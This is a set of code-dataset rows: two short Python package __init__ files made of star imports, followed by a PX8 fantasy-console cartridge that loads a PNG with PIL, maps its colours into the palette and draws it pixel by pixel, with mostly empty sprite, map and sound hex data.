| 97.846154 | 1,012 | 0.934748 | 44 | 1,272 | 26.977273 | 0.613636 | 0.016849 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.821078 | 0.037736 | 1,272 | 12 | 1,013 | 106 | 0.148693 | 0 | 0 | 0 | 0 | 0 | 0.786164 | 0.786164 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
485bd1595d99a78a6756bc76566aa7d2cf851708 | 110 | py | Python | luvina/backend/backend.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | null | null | null | luvina/backend/backend.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | null | null | null | luvina/backend/backend.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | null | null | null |
from .enchant_backend import *
from .nltk_backend import *
from .spacy_backend import *
from .common import *
| 22 | 30 | 0.781818 | 15 | 110 | 5.533333 | 0.466667 | 0.46988 | 0.614458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 110 | 4 | 31 | 27.5 | 0.882979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4872f72df1a4000bb4bfea63b6cf52d3e678227c | 192 | py | Python | rubin_sim/scheduler/surveys/__init__.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | ["MIT"] | null | null | null | rubin_sim/scheduler/surveys/__init__.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | ["MIT"] | null | null | null | rubin_sim/scheduler/surveys/__init__.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | ["MIT"] | null | null | null |
from .base_survey import *
from .surveys import *
from .dd_surveys import *
from .scripted_surveys import *
from .too_surveys import *
from .desc_ddf import *
from .plan_night_survey import *
| 24 | 32 | 0.78125 | 28 | 192 | 5.107143 | 0.428571 | 0.41958 | 0.475524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 192 | 7 | 33 | 27.428571 | 0.871951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4875428bbca4b69dfb60035060ebe43cbd598d4e | 37,517 | py | Python | demos/sprites/sprite1.py | rlugojr/PX8 | b081611dde998a06910d57037ca20b5fbd90123b | ["MIT"] | 21 | 2019-05-31T17:15:54.000Z | 2022-02-26T04:59:07.000Z | demos/sprites/sprite1.py | rlugojr/PX8 | b081611dde998a06910d57037ca20b5fbd90123b | ["MIT"] | null | null | null | demos/sprites/sprite1.py | rlugojr/PX8 | b081611dde998a06910d57037ca20b5fbd90123b | ["MIT"] | 1 | 2020-06-11T14:57:11.000Z | 2020-06-11T14:57:11.000Z |
px8 / python cartridge
version 1

__python__

from PIL import Image

# Load a PNG and display it directly by adding its colors to the palette
def _init():
    cls()
    im = Image.open("./demos/assets/Tux.png")
    print(im)
    pix = im.load()
    width, height = im.size
    print(width, height)
    palettes = {}
    idx = 16
    for x in range(width):
        for y in range(height):
            # Drop the alpha channel; key the palette on the RGB triple
            v = pix[x, y][:-1]
            if v not in palettes:
                palettes[v] = idx
                set_palette_color(idx, v[0], v[1], v[2])
                idx += 1
            pset(x, y, palettes[v])


def _update():
    pass


def _draw():
    pass
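

# Sketch of the palette-deduplication idea used in _init above: each distinct
# RGB triple is handed the next free palette slot. Starting at 16 (as idx = 16
# does above) is assumed to skip the cartridge's 16 built-in palette colors.
def build_palette(pixels, first_free=16):
    palette = {}
    for rgb in pixels:
        if rgb not in palette:
            palette[rgb] = first_free + len(palette)
    return palette


assert build_palette([(0, 0, 0), (9, 9, 9), (0, 0, 0)]) == {(0, 0, 0): 16, (9, 9, 9): 17}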
__gfx__
10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088088000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888887800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888888800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088888000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000008880000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000077007700777777007700000077000000777777000000000770007700777777007777770077000000777700000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770007700770077007700770077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770707700770077007700770077000000770077000000000000000000000000000000000
00000000077777700777700007700000077000000770077000000000777777700770077007777000077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000777077700770077007700770077000000770077000000000000000000000000000000000
00000000077007700777777007777770077777700777777000000000770007700777777007700770077777700777777000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__gff__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__map__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__sfx__
0110000000472004620c3400c34318470004311842500415003700c30500375183750c3000c3751f4730c375053720536211540114330c37524555247120c3730a470163521d07522375164120a211220252e315
01100000183732440518433394033c65539403185432b543184733940318433394033c655306053940339403184733940318423394033c655394031845321433184733940318473394033c655394033940339403
01100000247552775729755277552475527755297512775524755277552b755277552475527757297552775720755247572775524757207552475227755247522275526757297552675722752267522975526751
01100000001750c055003550c055001750c055003550c05500175180650c06518065001750c065003650c065051751106505365110650c17518075003650c0650a145160750a34516075111451d075113451d075
011000001b5771f55722537265171b5361f52622515265121b7771f76722757267471b7461f7362271522712185771b5571d53722517187361b7261d735227122454527537295252e5171d73514745227452e745
01100000275422754227542275422e5412e5452b7412b5422b5452b54224544245422754229541295422954224742277422e7422b7422b5422b5472954227542295422b742307422e5422e7472b547305462e742
0110000030555307652e5752b755295622e7722b752277622707227561297522b072295472774224042275421b4421b5451b5421b4421d542295471d442295422444624546245472444727546275462944729547
0110000000200002000020000200002000020000200002000020000200002000020000200002000020000200110171d117110171d227131211f227130371f2370f0411b1470f2471b35716051221571626722367
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e775000002e1752e075000002e1752e77500000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__music__
00 00044208
00 00044108
